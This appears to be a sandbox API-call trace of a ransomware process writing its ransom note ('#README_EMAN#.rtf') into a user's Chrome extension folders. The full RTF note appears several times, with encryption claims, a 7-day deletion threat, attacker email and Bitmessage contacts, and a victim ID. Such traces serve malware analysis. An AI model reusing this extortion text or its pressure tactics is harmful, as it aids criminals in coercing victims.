g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.081] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.125] CloseHandle (hObject=0x294) returned 1 [0285.125] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\#readme_eman#.rtf")) returned 0xffffffff [0285.125] GetLastError () returned 0x2 [0285.125] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 